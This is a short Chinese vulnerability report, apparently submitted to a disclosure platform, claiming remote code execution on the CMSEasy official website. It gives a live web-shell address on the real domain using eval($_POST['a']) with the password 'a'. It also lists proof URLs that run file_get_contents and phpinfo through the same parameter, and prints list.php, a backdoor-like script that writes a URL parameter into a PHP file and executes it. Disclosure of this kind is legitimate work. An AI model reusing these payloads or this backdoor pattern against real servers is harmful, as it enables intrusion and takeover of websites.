cmseasy官网无条件getshell

### 简要描述： CMS官网 无条件getshell 想走个大场商 求20rank ### 详细说明： 首先先看webshell 要不直接把我的webshell给覆盖掉了 菜刀地址 http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29; 密码a [<img src="https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png" alt="22222222222222222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png) ### 漏洞证明： view-source:http://www.cmseasy.cn/post/list.php?list=echo%20file_get_contents(%27list.php%27); ``` <?php /* * *文章列表生成文件 */ if(isset($_GET['list'])){ mud(); } function mud(){ $fp=fopen('content_batch_stye.html','w'); file_put_contents('content_batch_stye.html',"<?php\r\n"); file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND); fclose($fp); require 'content_batch_stye.html';} ?> ``` ``` http://www.cmseasy.cn/post/list.php?list=phpinfo(); ``` [<img src="https://images.seebug.org/upload/201511/031534127d2d7c95b3ac3372613acfbc020c4dee.png" alt="QQ20151103-1@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031534127d2d7c95b3ac3372613acfbc020c4dee.png)